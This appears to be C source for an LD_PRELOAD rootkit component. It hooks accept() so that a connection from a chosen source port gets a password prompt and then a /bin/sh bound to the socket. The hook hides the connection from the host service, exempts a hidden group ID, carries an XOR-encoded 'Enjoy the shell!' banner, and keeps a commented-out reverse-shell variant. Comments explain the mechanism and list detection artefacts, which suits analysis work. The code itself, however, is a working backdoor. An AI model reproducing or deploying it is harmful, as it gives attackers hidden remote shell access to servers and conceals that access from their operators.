#include "father.h"

/*
 * Banner written to the client socket by the accept() hook below once the
 * password check passes.
 *
 * The bytes are stored encoded: the hook runs memfrob() over the array, which
 * XORs every byte with 42 (0x2a), immediately before sending it. Decoding by
 * hand: 0x65 ^ 0x2a = 'O', 0x0a ^ 0x2a = ' ', 0x20 ^ 0x2a = '\n',
 * 0x23 ^ 0x2a = '\t'. The tail of the array decodes to "Enjoy the shell!".
 *
 * Analysis note: because of the encoding, the decoded text is not what a
 * plain strings scan of the object would show; a signature on the stored
 * bytes has to match the encoded values listed here. The decoded form is what
 * appears on the wire, wrapped in the ESC[1m / ESC[0m sequences the hook
 * emits around it.
 *
 * The array is writable (no const) because memfrob() decodes it in place.
 */
char art[] = {
    0x20, 0x23, 0x23, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x20, 0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x20,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0x20, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0x20, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0x20, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x20, 0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x20, 0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x20,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0x65, 0x65, 0x65, 0xa,
    0xa,  0xa,  0xa,  0x2,  0xa,  0x3,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0x20, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0xa,  0x3,  0xa,  0x3,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0x20, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0xa,  0x2,  0xa,  0x2,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x20, 0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x20, 0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x1a, 0xa,  0xa,  0xa,  0xa,  0x17, 0x65,
    0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x20,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,
    0x17, 0x65, 0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0x20, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x56, 0x56, 0x56,
    0x56, 0x56, 0x65, 0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0x20, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0x20, 0xa,  0xa,  0xa,  0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0x20, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x20, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x20,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x20, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x20, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x20, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x20, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x20, 0x20, 0x23,
    0x23, 0x6f, 0x44, 0x40, 0x45, 0x53, 0xa,  0x5e, 0x42, 0x4f, 0xa,  0x59,
    0x42, 0x4f, 0x46, 0x46, 0xb,  0x20, 0x20, 0x20,
};

/*
 * accept() hook. If connection comes from our port, use the socket for a bind
 * shell. Alternatively connect back over our hidden port.
 *
 * How it works, as visible in this function:
 *  - The function is named accept() and forwards to the next definition of
 *    that symbol found with dlsym(RTLD_NEXT, ...), i.e. it interposes on the
 *    real accept() of whatever process has this object loaded ahead of libc.
 *  - Callers whose effective GID equals GID get the real accept() untouched.
 *  - For everyone else the peer's TCP source port is compared with
 *    SOURCEPORT. On a match the process forks; the child prompts for a
 *    password on the new socket and, if it matches, execs /bin/sh with the
 *    socket as stdin/stdout/stderr. The parent reports the connection to the
 *    host application as failed with ECONNABORTED.
 *
 * Observable artefacts for detection and triage:
 *  - the literal prompt "\n\nAUTHENTICATE: " sent to a client before any
 *    application protocol data, on a port owned by a legitimate service;
 *  - a /bin/sh child of a network service whose fds 0-2 are a TCP socket;
 *  - accept() returning -1/ECONNABORTED in the host service for connections
 *    from one specific source port (visible in strace or service error logs);
 *  - no close() of the accepted descriptor on the parent path in this
 *    function, so the host process keeps that connection open as well.
 *
 * GID, SOURCEPORT, SHELL_PASS and HIDDENPORT are not defined in this file;
 * presumably they come from father.h -- confirm there.
 */

/* Cached pointer to the next accept() in symbol resolution order. */
int (*o_accept)(int, struct sockaddr *, socklen_t *);
int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen) {

#ifdef DEBUG
  fprintf(stderr, "accept() called!\n");
#endif

  /* Resolve the real accept() lazily, on first use. */
  if (!o_accept)
    o_accept = dlsym(RTLD_NEXT, "accept");

  /* Processes running under the designated group bypass the hook entirely. */
  if (getegid() == GID)
    return o_accept(sockfd, addr, addrlen);

  socklen_t mylen;
  struct sockaddr_in mysa;
  struct sockaddr_in *sockaddrptr;
  mylen = sizeof(mysa);

  /* Return value of the real accept(): the new descriptor, or -1 on error. */
  int check;

  if (addr == NULL) {
    /*
     * The caller did not ask for the peer address; pass a local buffer so the
     * source port can still be inspected.
     */
    check = o_accept(sockfd, (struct sockaddr *)&mysa, &mylen);
    sockaddrptr = &mysa;
  } else {
    check = o_accept(sockfd, addr, addrlen);
    /*
     * NOTE(review): the caller's buffer is read as sockaddr_in without
     * looking at the address family, and the result of accept() is not
     * checked before the port comparison below.
     */
    sockaddrptr = (struct sockaddr_in *)addr;
  }

  /* Trigger condition: the peer connected from source port SOURCEPORT. */
  if (sockaddrptr && ntohs(sockaddrptr->sin_port) == SOURCEPORT) {
    /*
    // uncomment and comment out the rest to connect via a reverse shell instead
    struct in_addr ip = sockaddrptr->sin_addr;
    char ip_as_str[INET_ADDRSTRLEN];
    inet_ntop(AF_INET, &ip, ip_as_str, INET_ADDRSTRLEN);
    int port = (int)strtol(HIDDENPORT, NULL, 16);
    backconnect(ip_as_str, port);
    */

    pid_t pid;
    if ((pid = fork()) == 0) {
      /* Child: runs the password prompt on the accepted socket. */
      char pwd[512];
      write(check, "\n\nAUTHENTICATE: ", 16);
      read(check, pwd, 512);

      /* Substring match: any input containing SHELL_PASS is accepted. */
      if (strstr(pwd, SHELL_PASS)) {

        /* Decode the XOR-42 encoded banner in place before sending it. */
        memfrob(art, sizeof(art));

        /* Banner is wrapped in ANSI bold-on / attribute-reset sequences. */
        write(check, "\033[1m", strlen("\033[1m"));
        write(check, art, sizeof(art));
        write(check, "\033[0m", strlen("\033[0m"));

        /*
         * When running as root, switch the shell to group GID; given the
         * getegid() test at the top of this function, processes in that
         * group are passed through by this hook.
         */
        if (geteuid() == 0)
          setgid(GID);

        /* Attach the socket to stdin, stdout and stderr of the shell. */
        dup2(check, 0);
        dup2(check, 1);
        dup2(check, 2);

        execl("/bin/sh", "/bin/sh", (char *)NULL);
      }
      /*
       * A child that fails the password check (or whose execl() fails) is not
       * terminated here: pid is 0, so it skips the branch below and returns
       * the descriptor to the host application's code in the forked copy.
       */
    }

    /*
     * Parent (pid > 0) or failed fork (pid == -1): hide the connection from
     * the host application by reporting an aborted connection.
     */
    if (pid != 0) {
      errno = ECONNABORTED;
      return -1;
    }
  }

  return check;
}
